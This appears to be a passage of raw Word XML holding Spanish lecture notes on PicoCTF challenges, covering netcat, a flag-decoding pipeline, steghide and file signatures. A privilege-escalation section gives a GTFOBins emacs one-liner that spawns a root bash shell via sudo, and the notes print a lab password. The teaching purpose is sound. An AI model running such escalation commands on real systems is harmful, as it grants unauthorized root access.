    <w:p w14:paraId="09ADBCC6" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692FA8DB" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:r w:rsidRPr="00A5184A">
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="646DCAD9" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sesión 2 — 14 de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Mayo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> de 2026 (Jueves </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>pre-parcial</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630BD93F" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>PicoCTF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> — Desafíos de Ciberseguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589A2DBC" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>PicoCTF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> es una plataforma de competencia en seguridad informática (CTF = Capture </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>The</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>). Se accede desde Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD97C0F" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B792178" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Preparación del entorno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14A95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05C027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# Crear la estructura de carpetas para los retos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mkdir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-p /home/COM500/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PicoCTF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chmod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700 /home/COM500/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PicoCTF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ls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-la</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4076CBB4" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28719E4B" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Reto: convertme.py — Conversión de decimal a binario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0B438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D27E49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python3 convertme.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38429F66" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE9E046" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Reto: fixme1.py — Corregir errores de sintaxis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4DBD91" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Categorías de retos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>PicoCTF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Reversing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">, Web, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Forensics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Cryptography</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Binary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Exploitation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6E18F3" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC001BC" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Conexión remota con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0F72DE" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>) abre una conexión de red y espera entrada/salida. Se usa para conectarse a instancias remotas de los retos.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6EFCF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B6AC4F" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pP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nc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&lt;IP_DEL_SERVIDOR&gt; &lt;PUERTO&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79A9979F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54027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AB8DA" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">🔑 Credenciales del laboratorio </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CyLab</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A5184A">
              <w:t>Contraseña: +clau123+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E1EC151" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CEB42F3" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Pipeline de transformación de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>flags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="68744E4C" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Muchas </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>flags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>PicoCTF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> vienen codificadas. El pipeline de comandos de Linux permite transformarlas en cadena:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ECBAB6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025DF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C3B0AF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# Pipeline completo de decodificación (5 pasos) # 1. Decodificar Base64 echo '&lt;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texto_codificado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&gt;' | base64 -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d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2. Invertir el texto echo '&lt;texto&gt;' | </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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rev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3. Cambiar guiones por guiones bajos echo '&lt;texto&gt;' |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'-' '_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'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4. Cambiar paréntesis por llaves (formato de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flag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) echo '&lt;texto&gt;' |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'()' '{}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'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5. Aplicar ROT13 (rotación de letras 13 posiciones) echo '&lt;texto&gt;' |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'a-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zA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-Z' 'n-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za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mN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-ZA-M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'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Pipeline </w:t>
            </w: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completo en una sola línea de ejemplo: echo '&lt;entrada&gt;' | base64 -d |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rev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|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'-' '_' |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'()' '{}' |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'a-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zA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-Z' 'n-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za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mN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-ZA-M'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69FB1F18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2123F4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4C9F0" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">📌 Formato de las </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>flags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A5184A">
              <w:t xml:space="preserve">Las </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t>flags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t xml:space="preserve"> siempre usan llaves {}, nunca paréntesis. Ejemplo: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t>picoCTF</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t>{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t>Reversing_t3xt_}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B65A7B5" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05DFB2FC" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Editor GNU Nano — Comandos esenciales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092B4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E21422" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pP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Ctrl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+ O       → Guardar (luego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Enter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para confirmar el nombre)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Ctrl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+ X       → Salir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Ctrl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+ X → Y   → Guardar y salir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Ctrl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+ X → N   → Salir sin guardar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CECC38A" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02166D96" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Escalada de privilegios — sudo y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>GTFOBins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35EC9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76CEE9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sudo -l             # Ver qué comandos puede ejecutar el usuario actual con sudo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sudo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-i             # Escalar a una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shell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de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root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si está permitido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whoami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# Verificar usuario actual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ls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-la              # Listar archivos con permisos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cat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flag.txt        # Leer la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flag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pwd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# Ver directorio actual cd /home            # Navegar al directorio de usuarios</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="512BCD01" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18648C3D" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> (gtfobins.github.io) es una referencia de binarios Unix que pueden usarse para escalar privilegios si se les concede sudo. Ejemplo: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>emacs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>vim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6464B0B6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6A67C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DC2AEF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# Escalada de privilegios a través de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emacs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(según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GTFOBins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) sudo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emacs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-Q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nw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eval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'(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term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"/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bin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bash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")'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B34DDE1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36B7C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0BC62" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️ Salir de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>emacs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t>Ctrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t xml:space="preserve"> + C para interrumpir, luego </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t>Ctrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00A5184A">
              <w:t xml:space="preserve"> + X para salir del editor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4322BD24" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26BEDEC7" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:r w:rsidRPr="00A5184A">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="037543D3" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sesión 3 — 11 de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Junio</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> de 2026 (Jueves)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B7ACBA" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Esteganografía — Ocultamiento de Información</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556A2274" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>La esteganografía consiste en ocultar información dentro de archivos aparentemente inocentes (imágenes, audio, video), de modo que el mensaje esté presente pero no sea visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B88F89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2A1A0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75AFA" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:r w:rsidRPr="00A5184A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">🔍 Diferencia clave: </w:t>
            </w:r>
            <w:r w:rsidRPr="00A5184A">
              <w:t>Criptografía = oculta el CONTENIDO del mensaje.  Esteganografía = oculta la EXISTENCIA del mensaje.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44325011" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593663E2" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Instalación de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Steghide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79241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A2A86D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sudo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apt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update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sudo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apt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install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steghide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-y</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7798D89B" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DBAACD1" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Preparar el entorno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250DD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84A72A" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pP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mkdir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COM560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chmod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700 COM560 cd COM560 # Descargar o copiar una imagen de portada al directorio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ls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-la</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FE0AAA4" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08FF20CF" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Comandos de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Steghide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44651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9A66C3" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pP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steghide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help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# Ver lista completa de comandos y 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opciones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EMBEBER: ocultar un archivo dentro de una imagen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steghide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embed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cf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imagen.jpeg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sf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secreto.txt #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cf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cover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file (archivo de portada) #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sf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secret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file (archivo a ocultar)  # EXTRAER: recuperar el archivo oculto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steghide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extract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sf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imagen-resultado.jpeg #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sf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stego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file (imagen con datos ocultos)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7644A926" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431A0519" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">Números Mágicos (Magic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Numbers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> / File </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Signatures</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5842784E" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Cada tipo de archivo tiene una firma hexadecimal en sus primeros bytes que lo identifica, independientemente de su extensión. Esto se llama 'número mágico'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090E3B94" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02105E2F" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:t>Ejemplo: un archivo con extensión .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve"> puede ser realmente un PDF si sus primeros bytes son 25 50 44 46 (que corresponde a %PDF). Herramientas como 'file' o editores hexadecimales (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>xxd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>hexeditor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A5184A">
        <w:t>) permiten verificar el tipo real.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F9D424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0FBB9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4C4338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file imagen.jpeg          # Detecta el tipo real del archivo por su firma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xxd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imagen.jpeg | head    # Ver los primeros bytes en hexadecimal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AFDB63F" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="004B3814">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62455F6F" w14:textId="77777777" w:rsidR="004B3814" w:rsidRPr="00A5184A" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00A5184A">
        <w:lastRenderedPageBreak/>
